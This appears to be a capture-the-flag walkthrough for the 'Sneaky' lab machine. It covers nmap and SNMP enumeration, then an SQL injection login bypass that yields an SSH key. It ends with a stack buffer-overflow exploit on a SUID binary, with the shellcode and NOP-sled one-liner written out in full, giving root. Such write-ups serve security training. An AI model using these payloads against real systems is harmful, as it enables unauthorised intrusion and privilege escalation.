Difficulty Rating:

Machine: Sneaky
OS: Linux
Target IP: 10.10.10.20

  • Nmap scan for TCP
$ nmap -T4 -Pn -sV -A  10.10.10.20 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-30 17:09 IST
Nmap scan report for 10.10.10.20
Host is up (0.15s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.32 seconds
  • Nmap scan for UDP
sudo nmap -sV -Pn -A -sU 10.10.10.20 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-30 21:21 IST
Nmap scan report for 10.10.10.20
Host is up (0.63s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: fcf2da02d0831859
|   snmpEngineBoots: 6
|_  snmpEngineTime: 4h14m51s
| snmp-interfaces: 
|   lo
|     IP address: 127.0.0.1  Netmask: 255.0.0.0
|     Type: softwareLoopback  Speed: 10 Mbps
|     Traffic stats: 184.80 Kb sent, 184.80 Kb received
|   eth0
|     IP address: 10.10.10.20  Netmask: 255.255.255.0
|     MAC address: 00:50:56:aa:0b:69 (VMware)
|     Type: ethernetCsmacd  Speed: 4 Gbps
|_    Traffic stats: 88.21 Mb sent, 84.90 Mb received
| snmp-netstat: 
|   TCP  127.0.0.1:3306       0.0.0.0:0
|_  UDP  0.0.0.0:161          *:*
| snmp-processes: 
|   1: 
|     Name: init
|   381: 
|     Name: upstart-udev-br
|   388: 
|     Name: systemd-udevd
|   466: 
|     Name: dbus-daemon
|   483: 
|     Name: systemd-logind
|   488: 
| 
|   496: 
| 
|   830: 
| 
|   886: 
| 
|   889: 
| 
|   894: 
| 
|   895: 
| 
|   898: 
| 
|   930: 
| 
|   933: 
| 
|   935: 
| 
|   936: 
| 
|   1042: 
| 
|   1048: 
| 
|   1130: 
| 
|   1173: 
| 
|   1498: 
| 
|   1507: 
| 
|   1536: 
| 
|   1537: 
| 
|   1541: 
| 
|   1592: 
| 
|   1612: 
| 
|   1614: 
| 
|   1615: 
| 
|_  1632: 
| snmp-sysdescr: Linux Sneaky 4.4.0-75-generic #96~14.04.1-Ubuntu SMP Thu Apr 20 11:06:56 UTC 2017 i686
|_  System uptime: 4h14m52.11s (1529211 timeticks)
|_snmp-win32-software: 
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops
Service Info: Host: Sneaky

TRACEROUTE (using port 63555/udp)
HOP RTT       ADDRESS
1   658.26 ms 10.10.14.1
2   659.87 ms 10.10.10.20

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1115.86 seconds

  • SNMP is enabled
  • Using snmpwalk let’s find ipv6 address
$ snmpwalk -v2c -c public 10.10.10.20 1.3.6.1.2.1.4.34.1.3
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.20 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.10.10.10.255 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.1.4.127.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 1
iso.3.6.1.2.1.4.34.1.3.2.16.222.173.190.239.0.0.0.0.2.80.86.255.254.170.11.105 = INTEGER: 2
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.170.11.105 = INTEGER: 2
  • The address we require is 222.173.190.239.0.0.0.0.2.80.86.255.254.170.11.105
  • Converting it to hexadecimal format it looks like dead:beef::0250:56ff:feaa:0b69

  • Nmap on ipv6 address
$ nmap -sV -A -6 dead:beef::0250:56ff:feaa:0b69

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-30 22:11 IST
Nmap scan report for dead:beef::250:56ff:feaa:b69
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 5d:5d:2a:97:85:a1:20:e2:26:e4:13:54:58:d6:a4:22 (DSA)
|   2048 a2:00:0e:99:0f:d3:ed:b0:19:d4:6b:a8:b1:93:d9:87 (RSA)
|   256 e3:29:c4:cb:87:98:df:99:6f:36:9f:31:50:e3:b9:42 (ECDSA)
|_  256 e6:85:a8:f8:62:67:f7:01:28:a1:aa:00:b5:60:f2:21 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 400 Bad Request
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| address-info: 
|   IPv6 EUI-64: 
|     MAC address: 
|       address: 00:50:56:aa:0b:69
|_      manuf: VMware

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.18 seconds
  • Port 22* and **80 are open

  • Dirb

$ dirb http://10.10.10.20

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jul 30 17:33:03 2017
URL_BASE: http://10.10.10.20/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.20/ ----
==> DIRECTORY: http://10.10.10.20/dev/                                                                                   
+ http://10.10.10.20/index.html (CODE:200|SIZE:183)                                                                            
+ http://10.10.10.20/server-status (CODE:403|SIZE:291)                                                                          
                                                                                                                                                                                             
---- Entering directory: http://10.10.10.20/dev/ ----
+ http://10.10.10.20/dev/index.html (CODE:200|SIZE:464)                                                                        
                                                                                                                                                                                             
-----------------
END_TIME: Sun Jul 30 18:06:14 2017
DOWNLOADED: 9224 - FOUND: 3
  • Visiting 10.10.10.8/dev/index.html gives login box
  • It is vulnerable to SQL injection
  • Enter ' or 1=1;# to get access
  • You get a SSH private key and to usernames.
  • SSH is running on ipv6 address
  • Let’s connect
$ ssh -i new_key.txt [email protected]:beef::0250:56ff:feaa:0b69
  • To own system, check for suid files
$ find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
  • We find an executable name /usr/local/bin/chal
  • After enumerating the executable file, we understand it is an elf executable file 32 bit and it uses strcpy().
  • Function strcpy() is vulnerable to Buffer Overflow
  • After running gdb and understanding memory allocations, following code will successfully run shell with root user.
  • The shell code used is
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80
[email protected]:/usr/local/bin$ ./chal $(python -c 'print "\x90"*330 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" + "\x42\xf4\xff\xbf"*30')
# id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(thrasivoulos)
# cat /root/root.txt
XXXXXXXXXX
  • The address \x42\xf4\xff\xbf should be inserted in $ebp and $eip registers. This address will point to of of the NOP instruction, which will further lead to the shellcode execution.
User and Root owned!!

SNMP wikipedia
LiveOverflow tutorials on BOFs
Resource for getting different shellcodes

Share the fun!